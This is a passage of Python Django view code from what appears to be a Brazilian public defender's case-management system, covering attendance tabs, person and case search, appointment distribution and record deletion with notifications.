config.ATIVAR_SIGILO_ABAS_ATENDIMENTO.title().replace(\" \", \"\").split(',')\r\n acesso_concedido = atendimento.acesso_concedido(request.user.servidor.defensor)\r\n pode_visualizar_aba = True\r\n sigla_uf = settings.SIGLA_UF.upper()\r\n\r\n evento_desbloqueio = 
Evento.get_desbloqueio_vigente_por_usuario(usuario=request.user.servidor.defensor).first()\r\n\r\n if evento_desbloqueio:\r\n diaMin = date(evento_desbloqueio.data_ini.year, evento_desbloqueio.data_ini.month, 1)\r\n elif hoje.day <= config.DIA_LIMITE_CADASTRO_FASE:\r\n diaMin -= relativedelta(months=1)\r\n\r\n try:\r\n if abas_atendimento_restritas[2] == 'True' and not atendimento_permissao and not acesso_concedido:\r\n pode_visualizar_aba = False\r\n except IndexError:\r\n pode_visualizar_aba = True\r\n\r\n sistemas_webservices_procapi = []\r\n\r\n if config.ATIVAR_PROCAPI:\r\n from procapi_client.services import APISistema\r\n sistemas_webservices_procapi = APISistema().listar_todos()\r\n\r\n return render(request=request, template_name=\"atendimento/atender_tab_processo.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef atender_tab_processos_eproc(request, atendimento_numero):\r\n\r\n atendimento = get_object_or_404(\r\n AtendimentoDefensor,\r\n numero=atendimento_numero,\r\n remarcado=None,\r\n ativo=True)\r\n\r\n atendimento_permissao = atendimento.permissao_acessar(usuario=request.user)\r\n abas_atendimento_restritas = config.ATIVAR_SIGILO_ABAS_ATENDIMENTO.title().replace(\" \", \"\").split(',')\r\n acesso_concedido = atendimento.acesso_concedido(request.user.servidor.defensor)\r\n pode_visualizar_aba = True\r\n\r\n try:\r\n if abas_atendimento_restritas[2] == 'True' and not atendimento_permissao and not acesso_concedido:\r\n pode_visualizar_aba = False\r\n except IndexError:\r\n pode_visualizar_aba = True\r\n\r\n if settings.SIGLA_UF.upper() == 'AM':\r\n return render(request=request, template_name=\"atendimento/atender_tab_tjam.html\", context=locals())\r\n\r\n return render(request=request, template_name=\"atendimento/atender_tab_eproc.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef atender_tab_procedimentos(request, atendimento_numero):\r\n atendimento = get_object_or_404(\r\n AtendimentoDefensor,\r\n numero=atendimento_numero,\r\n remarcado=None,\r\n ativo=True)\r\n atendimento_permissao = atendimento.permissao_acessar(usuario=request.user)\r\n abas_atendimento_restritas = config.ATIVAR_SIGILO_ABAS_ATENDIMENTO.title().replace(\" \", \"\").split(',')\r\n acesso_concedido = atendimento.acesso_concedido(request.user.servidor.defensor)\r\n pode_visualizar_aba = True\r\n propacs_acesso = permissao_acesso_propacs(request)\r\n\r\n try:\r\n if abas_atendimento_restritas[4] == 'True' and not atendimento_permissao and not acesso_concedido:\r\n pode_visualizar_aba = False\r\n except IndexError:\r\n pode_visualizar_aba = True\r\n print(\"Erro\")\r\n\r\n return render(request=request, template_name=\"atendimento/atender_tab_procedimento.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef atender_tab_oficios(request, atendimento_numero):\r\n return render(request=request, template_name=\"atendimento/atender_tab_oficio.html\", context=locals())\r\n\r\n\r\n@never_cache\r\n@login_required\r\n@permission_required('atendimento.change_atendimento')\r\ndef atender_get(request, atendimento_numero):\r\n\r\n resposta = []\r\n\r\n try:\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero, ativo=True, remarcado=None)\r\n except AtendimentoDefensor.DoesNotExist:\r\n atendimento = None\r\n\r\n if atendimento:\r\n\r\n inicial = atendimento.at_inicial\r\n arvore = Arvore.objects.filter(atendimento=inicial, data_exclusao=None, ativo=True).first()\r\n\r\n # se árvore não existe, tenta criar\r\n if not arvore:\r\n arvore = 
atendimento_cria_arvore(inicial.numero)\r\n\r\n # se árvore existe, retorna conteúdo\r\n if arvore:\r\n resposta = simplejson.loads(arvore.conteudo)\r\n\r\n if config.ATIVAR_ORDENACAO_ATENDIMENTO_DECRESCENTE:\r\n resposta.reverse()\r\n\r\n return JsonResponse(resposta, safe=False)\r\n\r\n\r\n@never_cache\r\n@login_required\r\n@permission_required('atendimento.change_atendimento')\r\ndef atender_processos_get(request, atendimento_numero):\r\n\r\n atendimento = get_object_or_404(\r\n AtendimentoDefensor,\r\n numero=atendimento_numero,\r\n ativo=True,\r\n remarcado=None\r\n )\r\n\r\n processos = atendimento.get_processos().filter(\r\n pre_cadastro=False,\r\n ).annotate(\r\n acao_nome=F('acao__nome'),\r\n atendimento_numero=F('parte__atendimento__numero')\r\n ).values(\r\n 'id',\r\n 'numero',\r\n 'numero_puro',\r\n 'chave',\r\n 'grau',\r\n 'tipo',\r\n 'acao_nome',\r\n 'atendimento_numero'\r\n )\r\n\r\n return JsonResponse(list(processos), safe=False)\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef atender_outros_get(request, atendimento_numero):\r\n\r\n atendimento = get_object_or_404(\r\n AtendimentoDefensor,\r\n numero=atendimento_numero,\r\n ativo=True,\r\n remarcado=None\r\n )\r\n\r\n if atendimento.requerente is None:\r\n raise Http404\r\n\r\n outros = AtendimentoPessoa.objects.select_related(\r\n 'atendimento__excluido_por',\r\n 'atendimento__defensor__defensor__servidor',\r\n 'atendimento__defensor__defensoria',\r\n 'atendimento__qualificacao__area',\r\n ).filter(\r\n atendimento__tipo__in=[Atendimento.TIPO_INICIAL, Atendimento.TIPO_VISITA, Atendimento.TIPO_PROCESSO],\r\n atendimento__inicial=None,\r\n atendimento__remarcado=None,\r\n pessoa=atendimento.requerente.pessoa,\r\n ativo=True\r\n ).exclude(\r\n atendimento__defensor=None,\r\n ).exclude(\r\n atendimento_id=atendimento.at_inicial.id\r\n )\r\n\r\n atendimentos = []\r\n for outro_pessoa in outros:\r\n outro = outro_pessoa.atendimento.defensor\r\n atendimentos.append({\r\n 'id': outro.id,\r\n 'numero': outro.numero,\r\n 'data_agendamento': Util.date_to_json(outro.data_agendamento) if outro.data_agendamento else None,\r\n 'data_atendimento': Util.date_to_json(outro.data_atendimento) if outro.data_atendimento else None,\r\n 'data_exclusao': Util.date_to_json(outro.data_exclusao) if outro.data_exclusao else None,\r\n 'motivo_exclusao': outro.motivo_exclusao,\r\n 'excluido_por': outro.excluido_por.nome if outro.excluido_por else None,\r\n 'requerente': outro.requerente.pessoa.nome if outro.requerente else None,\r\n 'requerido': outro.requerido.pessoa.nome if outro.requerido else None,\r\n 'defensor': outro.defensor.nome if outro.defensor else None,\r\n 'defensor_foto': outro.defensor.servidor.get_foto() if outro.defensor.servidor else None,\r\n 'defensoria': outro.defensoria.nome if outro.defensoria else None,\r\n 'nucleo': outro.nucleo.nome if outro.nucleo else None,\r\n 'area': outro.qualificacao.area.nome if outro.qualificacao else None,\r\n 'pedido': outro.qualificacao.titulo if outro.qualificacao else None,\r\n 'realizado': outro.realizado,\r\n 'processos': [],\r\n 'tipo': outro_pessoa.tipo,\r\n 'processo': (outro.tipo == Atendimento.TIPO_PROCESSO),\r\n 'ativo': outro.ativo,\r\n })\r\n\r\n for parte in outro.processo_partes:\r\n atendimentos[-1]['processos'].append({\r\n 'data_cadastro': Util.date_to_json(parte.data_cadastro),\r\n 'tipo': parte.processo.get_tipo_display(),\r\n 'numero': parte.processo.numero,\r\n 'numero_puro': parte.processo.numero_puro,\r\n 'grau': parte.processo.grau,\r\n 'parte': parte.parte,\r\n 'acao': 
parte.processo.acao.nome if parte.processo.acao else None,\r\n 'vara': parte.processo.vara.nome if parte.processo.vara else None,\r\n 'area': parte.processo.area.nome if parte.processo.area else None,\r\n })\r\n\r\n return JsonResponse(atendimentos, safe=False)\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef atender_procedimentos_propacs_get(request, atendimento_numero):\r\n procedimentos_list = []\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero, ativo=True, remarcado=None)\r\n inicial = atendimento.at_inicial if atendimento.at_inicial else atendimento\r\n procedimentos = inicial.procedimentos.filter(ativo=True)\r\n\r\n for procedimento in procedimentos:\r\n procedimentos_list.append({\r\n 'numero': procedimento.numero,\r\n 'uuid': str(procedimento.uuid),\r\n 'tipo': procedimento.tipo,\r\n 'tipo_nome': procedimento.get_tipo_display(),\r\n 'situacao': procedimento.get_situacao_display(),\r\n 'assunto': procedimento.assunto if procedimento.assunto else None,\r\n 'data_ultima_movimentacao': procedimento.data_ultima_movimentacao.strftime(\"%d/%m/%Y %H:%M:%S\"),\r\n\r\n })\r\n\r\n return JsonResponse(procedimentos_list, safe=False)\r\n\r\n\r\n@login_required\r\ndef buscar(request):\r\n\r\n if request.method == 'POST':\r\n\r\n numero_registros = 25\r\n pessoas_lst = None\r\n\r\n filtro = simplejson.loads(request.body)\r\n filtro_defensoria = filtro.get('defensoria')\r\n\r\n # Converte diferentes tipos de dados em lista para filtro de defensoria\r\n if isinstance(filtro_defensoria, str) and len(filtro_defensoria):\r\n filtro['defensoria'] = filtro['defensoria'].split(',')\r\n elif isinstance(filtro_defensoria, int):\r\n filtro['defensoria'] = [filtro['defensoria']]\r\n else:\r\n filtro['defensoria'] = []\r\n\r\n form = BuscarAtendimentoForm(filtro)\r\n\r\n if form.is_valid():\r\n\r\n atendimentos_lst = AtendimentoDefensor.objects.filter(\r\n Q(tipo__in=[\r\n Atendimento.TIPO_INICIAL,\r\n Atendimento.TIPO_RETORNO,\r\n Atendimento.TIPO_NUCLEO,\r\n Atendimento.TIPO_VISITA,\r\n Atendimento.TIPO_ENCAMINHAMENTO\r\n ]) &\r\n Q(remarcado=None)\r\n ).annotate(\r\n atividades=Sum(Case(When(filhos__ativo=True, filhos__tipo=Atendimento.TIPO_ATIVIDADE, then=Value(1)),\r\n default=Value(0), output_field=IntegerField())),\r\n tem_apoio=Sum(Case(When(filhos__ativo=True, filhos__tipo=Atendimento.TIPO_NUCLEO, then=Value(1)),\r\n default=Value(0), output_field=IntegerField())),\r\n ).order_by(\r\n '-data_agendamento',\r\n '-data_atendimento')\r\n\r\n if filtro.get('filtro'):\r\n\r\n filtro_texto = filtro.get('filtro').strip()\r\n filtro_numero = re.sub('[^0-9]', '', filtro_texto)\r\n\r\n if len(filtro_numero) == 12: # Numero do Atendimento\r\n\r\n atendimentos_lst = atendimentos_lst.filter(numero=filtro_numero)\r\n\r\n elif len(filtro_numero) in [11, 14]: # Numero do CPF ou CNPJ\r\n\r\n pessoas_lst = set(\r\n AtendimentoPessoa.objects.filter(\r\n pessoa__cpf=filtro_numero,\r\n ativo=True\r\n ).values_list('atendimento_id', flat=True)\r\n )\r\n\r\n else:\r\n\r\n # Tratamento da consulta por nome, nome_social e apelido (nome fantasia para PJ)\r\n # Se a consulta for com um nome com a quantidade de caracteres menos do que o mínimo configurado\r\n # será retornada uma mensagem de alerta para que o usuário faça filtros mais elaborados\r\n if config.BUSCAR_ATENDIMENTOS_FILTRO_NOME_MIN_CARACTERES and len(filtro_texto) < config.BUSCAR_ATENDIMENTOS_FILTRO_NOME_MIN_CARACTERES: # noqa: E501\r\n return JsonResponse({\r\n 'sucesso': False,\r\n 'mensagem': 'Erro: Aumente o texto para {} caracter(es) 
ou mais e tente novamente.'.format(\r\n config.BUSCAR_ATENDIMENTOS_FILTRO_NOME_MIN_CARACTERES\r\n )\r\n })\r\n\r\n filtro_norm = Util.normalize(filtro_texto)\r\n\r\n # tratamento da busca por nome, nome_social; e apelido (nome_fantasia) apenas para PJ\r\n\r\n q_nome = Q(pessoa__nome_norm__istartswith=filtro_norm)\r\n\r\n # TODO verificar o método Save de Pessoa. Não está mantendo o 'LTDA'.\r\n # TODO depois de verificar o método pode retirar o filtro por nome. Utilize apenas o nome_norm\r\n if 'LTDA' in filtro_texto:\r\n q_nome |= Q(pessoa__nome__istartswith=filtro_texto)\r\n\r\n # Só busca por nome social caso seja tipo pessoa física\r\n q_nome_social = Q(\r\n Q(pessoa__tipo=constantes.TIPO_PESSOA_FISICA) &\r\n Q(pessoa__nome_social__istartswith=filtro_texto)\r\n )\r\n\r\n # Só busca por nome fantasia (apelido) caso seja tipo pessoa jurídica\r\n q_nome_fantasia = Q(\r\n Q(pessoa__tipo=constantes.TIPO_PESSOA_JURIDICA) &\r\n Q(pessoa__apelido__istartswith=filtro_texto)\r\n )\r\n\r\n q = Q(ativo=True)\r\n q &= Q(pessoa__desativado_em=None)\r\n q &= Q(q_nome | q_nome_social | q_nome_fantasia)\r\n\r\n # Só executa o Bloqueio de Maria caso não tenha preenchido nenhum outro filtro\r\n if filtro.get('defensoria') or filtro.get('defensor') or form.cleaned_data['data_ini'] or form.cleaned_data['data_fim']: # noqa: E501\r\n pessoas_lst = set(AtendimentoPessoa.objects.filter(q).values_list('atendimento_id', flat=True))\r\n else:\r\n # Se a consulta retornar uma quantidade acima do limite configurado será retornada uma mensagem\r\n # de alerta para que o usuário faça filtros mais elaborados\r\n pessoas_count = AtendimentoPessoa.objects.filter(q).count()\r\n\r\n if config.BUSCAR_ATENDIMENTOS_FILTRO_NOME_MAX_PESSOAS and pessoas_count > config.BUSCAR_ATENDIMENTOS_FILTRO_NOME_MAX_PESSOAS: # noqa: E501\r\n return JsonResponse({\r\n 'sucesso': False,\r\n 'mensagem': 'Erro: Seriam retornados atendimentos de mais de {} pessoas. 
Preencha mais campos e tente novamente.'.format( # noqa: E501\r\n pessoas_count\r\n )\r\n })\r\n else:\r\n pessoas_lst = set(AtendimentoPessoa.objects.filter(q).values_list('atendimento_id', flat=True)) # noqa: E501\r\n\r\n if pessoas_lst is not None:\r\n if len(pessoas_lst):\r\n atendimentos_lst = atendimentos_lst.filter(\r\n (\r\n Q(id__in=pessoas_lst) |\r\n Q(inicial__in=pessoas_lst)\r\n ))\r\n else:\r\n atendimentos_lst = atendimentos_lst.none()\r\n\r\n if filtro.get('defensoria'):\r\n q = Q(defensoria_id=filtro.get('defensoria'))\r\n if type(filtro.get('defensoria')) is list:\r\n q = Q(defensoria_id__in=filtro.get('defensoria'))\r\n\r\n atendimentos_lst = atendimentos_lst.filter((q))\r\n\r\n if filtro.get('defensor'):\r\n\r\n defensor = Defensor.objects.filter(id=filtro.get('defensor')).first()\r\n\r\n if defensor.eh_defensor:\r\n atendimentos_lst = atendimentos_lst.filter((\r\n Q(defensor_id=filtro.get('defensor')) |\r\n Q(substituto_id=filtro.get('defensor'))\r\n ))\r\n elif not filtro.get('defensoria'):\r\n defensorias = list(defensor.atuacoes(vigentes=True).values_list('defensoria_id', flat=True))\r\n atendimentos_lst = atendimentos_lst.filter((\r\n Q(defensoria__in=defensorias)\r\n ))\r\n\r\n if form.cleaned_data['data_ini']:\r\n data_ini = form.cleaned_data['data_ini']\r\n\r\n atendimentos_lst = atendimentos_lst.filter((\r\n (\r\n Q(data_agendamento__gte=data_ini) &\r\n Q(data_atendimento=None)\r\n ) |\r\n Q(data_atendimento__gte=data_ini)\r\n ))\r\n\r\n if form.cleaned_data['data_fim']:\r\n data_fim = form.cleaned_data['data_fim']\r\n data_fim = datetime.combine(data_fim, time.max)\r\n\r\n atendimentos_lst = atendimentos_lst.filter((\r\n (\r\n Q(data_agendamento__lte=data_fim) &\r\n Q(data_atendimento=None)\r\n ) |\r\n Q(data_atendimento__lte=data_fim)\r\n ))\r\n\r\n if form.cleaned_data['situacao']:\r\n situacao = form.cleaned_data['situacao']\r\n if situacao == BuscarAtendimentoForm.SITUACAO_REALIZADO:\r\n atendimentos_lst = atendimentos_lst.filter(\r\n Q(ativo=True) &\r\n Q(data_atendimento__isnull=False)\r\n )\r\n elif situacao == BuscarAtendimentoForm.SITUACAO_AGENDADO:\r\n atendimentos_lst = atendimentos_lst.filter(\r\n Q(ativo=True) &\r\n Q(data_atendimento=None)\r\n )\r\n elif situacao == BuscarAtendimentoForm.SITUACAO_EXCLUIDO:\r\n atendimentos_lst = atendimentos_lst.filter(Q(data_exclusao__isnull=False))\r\n else:\r\n atendimentos_lst = atendimentos_lst.filter(Q(ativo=True))\r\n\r\n primeiro = filtro.get('pagina') * numero_registros\r\n ultimo = primeiro + numero_registros\r\n\r\n if filtro.get('pagina') == 0:\r\n filtro['total'] = atendimentos_lst.count()\r\n filtro['paginas'] = math.ceil(float(filtro.get('total')) / numero_registros)\r\n\r\n atendimentos_lst = atendimentos_lst[primeiro:ultimo]\r\n\r\n atendimentos_lst = atendimentos_lst.values(\r\n 'id',\r\n 'inicial_id',\r\n 'numero',\r\n 'data_atendimento',\r\n 'data_agendamento',\r\n 'data_exclusao',\r\n 'tipo',\r\n 'agenda',\r\n 'defensoria__nome',\r\n 'defensoria__codigo',\r\n 'defensoria__comarca',\r\n 'qualificacao__titulo',\r\n 'qualificacao__area__nome',\r\n 'defensor__servidor__nome',\r\n 'defensor__servidor__usuario__username',\r\n 'responsavel__servidor__papel__nome',\r\n 'responsavel__servidor__papel__css_label_class',\r\n 'responsavel__servidor__nome',\r\n 'substituto__servidor__nome',\r\n 'substituto__servidor__usuario__username',\r\n 'atividades',\r\n 'tem_apoio',\r\n 'tipo_motivo_exclusao_id'\r\n )\r\n\r\n atendimentos = []\r\n for atendimento in atendimentos_lst:\r\n\r\n inicial = 
atendimento['inicial_id'] if atendimento['inicial_id'] else atendimento['id']\r\n\r\n pessoas = AtendimentoPessoa.objects.filter(\r\n atendimento=inicial,\r\n ativo=True\r\n ).values('pessoa_id',\r\n 'pessoa__nome',\r\n 'pessoa__nome_social',\r\n 'pessoa__apelido',\r\n 'pessoa__tipo',\r\n 'tipo',\r\n 'responsavel',\r\n )\r\n\r\n atendimento['pessoas'] = list(pessoas)\r\n atendimento['extra'] = (atendimento['data_agendamento'] and atendimento['data_agendamento'].time() == time()) # noqa: E501\r\n atendimento['apoio'] = (atendimento['tipo'] == Atendimento.TIPO_NUCLEO)\r\n\r\n # Hack para diferenciar 'retorno' do 'pedido de apoio'\r\n if atendimento['tem_apoio']:\r\n atendimento['tipo'] = Atendimento.TIPO_NUCLEO_PEDIDO\r\n\r\n atendimento['pode_editar'] = False\r\n atendimento['pode_excluir'] = False\r\n\r\n if request.user.has_perm('atendimento.change_all_agendamentos') or (\r\n request.user.has_perm('atendimento.view_recepcao') and\r\n int(request.session.get('comarca', request.user.servidor.comarca_id)) == atendimento['defensoria__comarca']): # noqa: E501\r\n\r\n atendimento['pode_editar'] = atendimento['data_exclusao'] is None\r\n\r\n # TODO: Usar método Atendimento.pode_excluir()\r\n if atendimento['data_exclusao'] is None and not (atendimento['atividades'] or atendimento['apoio'] or (atendimento['data_atendimento'] and not request.user.is_superuser)): # noqa: E501\r\n atendimento['pode_excluir'] = True\r\n\r\n atendimentos.append(atendimento)\r\n\r\n else:\r\n\r\n atendimentos = []\r\n\r\n categorias_de_agendas = {}\r\n for categoria_agenda in Categoria.objects.all().values('id', 'nome'):\r\n categorias_de_agendas[categoria_agenda['id']] = categoria_agenda['nome']\r\n\r\n # Verifica que o recurso de arquivar/desarquivar atendimentos está habilitado antes de analisar o status\r\n if arquivamento_esta_habilitado() and atendimentos:\r\n # TODO verificar possibilidade de refatorar o status arquivado de property\r\n # para uma coluna física a fim de otimizar as consultas\r\n atendimentos_numero = map(lambda atendimento: atendimento[\"numero\"], atendimentos)\r\n status_atendimentos = consulta_status_arquivado(atendimentos_numero)\r\n for atendimento in atendimentos:\r\n atendimento[\"arquivado\"] = status_atendimentos[atendimento[\"numero\"]]\r\n\r\n return JsonResponse(\r\n {\r\n 'usuario': {\r\n 'comarca': int(request.session.get('comarca', request.user.servidor.comarca_id)),\r\n 'perms': {\r\n 'atendimento_view_recepcao': request.user.has_perm('atendimento.view_recepcao')\r\n }\r\n },\r\n 'atendimentos': atendimentos,\r\n 'pagina': filtro.get('pagina'),\r\n 'paginas': filtro.get('paginas', 0),\r\n 'ultima': filtro.get('pagina') == filtro.get('paginas') - 1 if filtro.get('paginas') else True,\r\n 'total': filtro.get('total'),\r\n 'LISTA': {\r\n 'TIPO': dict(Atendimento.LISTA_TIPO),\r\n 'AGENDA': categorias_de_agendas,\r\n },\r\n 'sucesso': True\r\n }, safe=False)\r\n\r\n prev = request.path\r\n prev_params = simplejson.dumps(dict(request.GET.items()))\r\n\r\n exibir_nome_da_defensoria = config.EXIBIR_NOME_DA_DEFENSORIA_NA_BUSCA_ATENDIMENTOS\r\n\r\n form = BuscarAtendimentoForm(request.GET)\r\n angular = 'BuscarCtrl'\r\n\r\n return render(request=request, template_name=\"atendimento/buscar.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef cronometro(request, atendimento_numero=None):\r\n cronometro = None\r\n\r\n if atendimento_numero:\r\n atendimento = Atendimento.objects.filter(numero=atendimento_numero).first()\r\n if atendimento:\r\n with transaction.atomic():\r\n cronometro = 
Cronometro.objects.filter(\r\n atendimento=atendimento,\r\n servidor=request.user.servidor,\r\n finalizado=False).first()\r\n if not cronometro:\r\n cronometro = Cronometro(\r\n atendimento=atendimento,\r\n servidor=request.user.servidor,\r\n finalizado=False)\r\n cronometro.save()\r\n elif request.session.get('ligacao_id'):\r\n cronometro = Cronometro.objects.filter(atendimento_id=request.session.get('ligacao_id')).first()\r\n\r\n if cronometro:\r\n cronometro.atualizar()\r\n return JsonResponse({'id': cronometro.id, 'duracao': cronometro.duracao, 'expirado': cronometro.expirado()})\r\n else:\r\n return JsonResponse({'erro': True, 'expirado': True})\r\n\r\n\r\n@login_required\r\ndef distribuir(request):\r\n\r\n if request.method == 'POST' and request.is_ajax():\r\n\r\n atuacoes = None\r\n assessores = None\r\n atendimentos = None\r\n\r\n try:\r\n dados = simplejson.loads(request.body)\r\n except ValueError:\r\n dados = None\r\n\r\n form = DistribuirAtendimentoForm(request.user, dados)\r\n\r\n if form.is_valid():\r\n\r\n data_ini = form.cleaned_data['data_ini']\r\n data_fim = datetime.combine(data_ini, time.max)\r\n defensor = form.cleaned_data['defensor']\r\n defensoria = form.cleaned_data['defensoria']\r\n forma_atendimento = form.cleaned_data['forma_atendimento']\r\n\r\n assessores = []\r\n atendimentos = []\r\n atuacoes = []\r\n\r\n # Obtém lista de todos agendamentos da defensoria para o dia\r\n atendimentos_lst = AtendimentoDefensor.objects.select_related(\r\n 'defensoria',\r\n 'defensor',\r\n 'substituto',\r\n 'qualificacao',\r\n 'qualificacao__area',\r\n 'agenda',\r\n 'forma_atendimento',\r\n ).filter(\r\n Q(ativo=True) &\r\n Q(remarcado=None) &\r\n Q(defensoria=defensoria) &\r\n Q(defensoria__nucleo__supervisionado=True) &\r\n (\r\n (\r\n Q(data_agendamento__gte=data_ini) &\r\n Q(data_agendamento__lte=data_fim)\r\n )\r\n )\r\n ).order_by('data_agendamento', 'data_atendimento')\r\n\r\n # Se informado, filtra agendamentos pelo defensor\r\n if defensor:\r\n atendimentos_lst = atendimentos_lst.filter(\r\n (\r\n Q(defensor=defensor) |\r\n Q(substituto=defensor)\r\n )\r\n )\r\n\r\n # Se informado, filtra agendamentos pela forma de atendimento\r\n if forma_atendimento:\r\n atendimentos_lst = atendimentos_lst.filter(\r\n forma_atendimento__presencial=(forma_atendimento == FormaAtendimento.TIPO_PRESENCIAL)\r\n )\r\n\r\n # Transforma dados\r\n for atendimento in atendimentos_lst:\r\n\r\n forma_atendimento = None\r\n if config.EXIBIR_PRESENCIAL_REMOTO_AGENDAMENTO and atendimento.forma_atendimento:\r\n forma_atendimento = 'P' if atendimento.forma_atendimento.presencial else 'R'\r\n\r\n pre_responsavel = atendimento.responsavel_id\r\n\r\n if not pre_responsavel and not atendimento.realizado and atendimento.inicial:\r\n # Obtém ultimo atendimento de retorno realizado\r\n ultimo_retorno = AtendimentoDefensor.objects.ultimos_validos().filter(\r\n inicial=atendimento.inicial,\r\n data_atendimento__isnull=False\r\n ).first()\r\n # Se não existe, usa o atendimento inicial como referência\r\n if not ultimo_retorno:\r\n ultimo_retorno = atendimento.inicial\r\n # Define o servidor que atendeu como responsável pelo novo atendimento\r\n if ultimo_retorno.atendido_por:\r\n pre_responsavel = ultimo_retorno.atendido_por.defensor.id\r\n else:\r\n pre_responsavel = ultimo_retorno.responsavel_id\r\n\r\n atendimentos.append({\r\n 'id': atendimento.id,\r\n 'numero': atendimento.numero,\r\n 'tipo': atendimento.LISTA_TIPO[atendimento.tipo][1],\r\n 'data_agendamento': 
atendimento.data_agendamento.strftime('%Y-%m-%dT%H:%M:00-03:00'),\r\n 'extra': atendimento.extra,\r\n 'requerente': atendimento.requerente.pessoa.nome if atendimento.requerente else None,\r\n 'requerente_hipossuficiente': atendimento.requerente.pessoa.avaliar() if atendimento.requerente else False, # noqa: E501\r\n 'requerido': atendimento.requerido.pessoa.nome if atendimento.requerido else None,\r\n 'defensoria': {'id': atendimento.defensoria.id, 'nome': atendimento.defensoria.nome},\r\n 'defensor': atendimento.substituto_id if atendimento.substituto_id else atendimento.defensor_id,\r\n 'area': atendimento.qualificacao.area.nome,\r\n 'pedido': atendimento.qualificacao.titulo,\r\n 'responsavel': atendimento.responsavel_id,\r\n 'pre_responsavel': pre_responsavel,\r\n 'agenda': {'id': atendimento.agenda.id, 'nome': atendimento.agenda.nome},\r\n 'forma_atendimento': forma_atendimento,\r\n 'realizado': atendimento.realizado,\r\n })\r\n\r\n # Obtém a lista de todos defensores/assessores lotados na defensoria\r\n for atuacao in Atuacao.objects.parcialmente_vigentes(inicio=data_ini).filter(defensoria=defensoria):\r\n\r\n assessores.append({\r\n 'id': atuacao.defensor.id,\r\n 'nome': atuacao.defensor.nome\r\n })\r\n\r\n if atuacao.defensor.eh_defensor:\r\n atuacoes.append({\r\n 'id': atuacao.id,\r\n 'tipo': atuacao.tipo,\r\n 'defensoria': {'id': atuacao.defensoria.id, 'nome': atuacao.defensoria.nome},\r\n 'defensor': {'id': atuacao.defensor.id, 'nome': atuacao.defensor.nome},\r\n })\r\n\r\n return JsonResponse({\r\n 'atuacoes': atuacoes,\r\n 'assessores': assessores,\r\n 'atendimentos': atendimentos\r\n })\r\n\r\n else:\r\n\r\n form = DistribuirAtendimentoForm(request.user, initial={\r\n 'data_ini': date.today(),\r\n 'defensoria': request.user.servidor.defensor.defensorias.filter(nucleo__supervisionado=True).first()\r\n })\r\n\r\n angular = 'DistribuicaoCtrl'\r\n\r\n return render(request=request, template_name=\"atendimento/distribuir.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef distribuir_salvar(request):\r\n dados = simplejson.loads(request.body)\r\n\r\n for item in dados:\r\n AtendimentoDefensor.objects.filter(id=item['id']).update(\r\n responsavel=item['pre_responsavel'],\r\n distribuido_por=request.user.servidor,\r\n data_distribuido=datetime.now())\r\n\r\n return JsonResponse({'success': True})\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.delete_atendimento')\r\n@reversion.create_revision(atomic=False)\r\ndef excluir(request, atendimento_numero=None):\r\n\r\n if not atendimento_numero:\r\n atendimento_numero = request.POST.get('atendimento')\r\n\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n atendimento.excluir(\r\n excluido_por=request.user.servidor,\r\n data_exclusao=datetime.now(),\r\n motivo_exclusao=request.POST.get('motivo_exclusao', '').replace('\\r\\n', '\\n'),\r\n tipo_motivo_exclusao_id=request.POST.get('tipo_motivo_exclusao')\r\n )\r\n\r\n reversion.set_user(request.user)\r\n reversion.set_comment(Util.get_comment_delete(request.user, atendimento))\r\n\r\n messages.success(request, u'Atendimento excluído.')\r\n\r\n # Se existe um atendimento para processo vinculado, transfere dados de volta\r\n try:\r\n atendimento_processo = AtendimentoDefensor.objects.get(\r\n inicial=atendimento,\r\n tipo=Atendimento.TIPO_PROCESSO,\r\n ativo=True\r\n )\r\n except ObjectDoesNotExist:\r\n atendimento_processo = None\r\n\r\n if atendimento_processo:\r\n\r\n service = AtendimentoService(atendimento)\r\n 
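# Devolve os dados relacionados ao atendimento de processo vinculado; com os\r\n        # parâmetros abaixo, filhos e documentos permanecem no atendimento excluído.\r\n        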
service.transferir_relacionamentos(\r\n atendimento_destino=atendimento_processo,\r\n transferir_filhos=False,\r\n transferir_documentos=False\r\n )\r\n\r\n atendimento_processo.inicial = None\r\n atendimento_processo.save()\r\n\r\n # Se for pré-agendamento no Painel do CRC, notifica assistido\r\n if atendimento.tipo == Atendimento.TIPO_LIGACAO:\r\n # Notifica assistido via chatbot Luna\r\n chatbot_notificar_requerente_exclusao.apply_async(\r\n kwargs={'numero': atendimento.numero},\r\n queue='sobdemanda'\r\n )\r\n # Notifica assistido via SMS\r\n if (config.USAR_SMS and config.SERVICO_SMS_DISPONIVEL):\r\n envia_sms_exclusao(request, atendimento, config.MENSAGEM_SMS_AGENDAMENTO_EXCLUSAO)\r\n # Notifica assistido via Email\r\n if (config.USAR_EMAIL):\r\n envia_email_exclusao(request, atendimento, config.MENSAGEM_EMAIL_AGENDAMENTO_EXCLUSAO)\r\n\r\n # Se atividade, redireciona para aba 'Atividades' do atendimento que a originou\r\n if atendimento.tipo == Atendimento.TIPO_ATIVIDADE and not request.GET.get('next'):\r\n return redirect('{}#/atividades'.format(reverse('atendimento_atender', args=[atendimento.origem.numero])))\r\n\r\n # Se next informado, inclui demais parametros e redireciona\r\n if request.GET.get('next'):\r\n params = request.GET['next']\r\n for param in request.GET:\r\n if param != 'next':\r\n params += \"&%s=%s\" % (param, request.GET[param])\r\n return redirect(params)\r\n else:\r\n return JsonResponse({'success': True})\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.delete_documento')\r\ndef excluir_documento(request, atendimento_numero=None):\r\n\r\n success = False\r\n mensagem = None\r\n\r\n if request.method == 'POST':\r\n\r\n if request.is_ajax():\r\n dados = simplejson.loads(request.body)\r\n else:\r\n dados = request.POST\r\n\r\n try:\r\n usuario = request.user\r\n documento = AtendimentoDocumento.objects.get(id=dados['id'], ativo=True)\r\n documento.excluir(excluido_por=usuario.servidor, agora=datetime.now())\r\n except Exception:\r\n mensagem = u'Erro ao excluir: O documento não existe!'\r\n else:\r\n mensagem = u'Documento 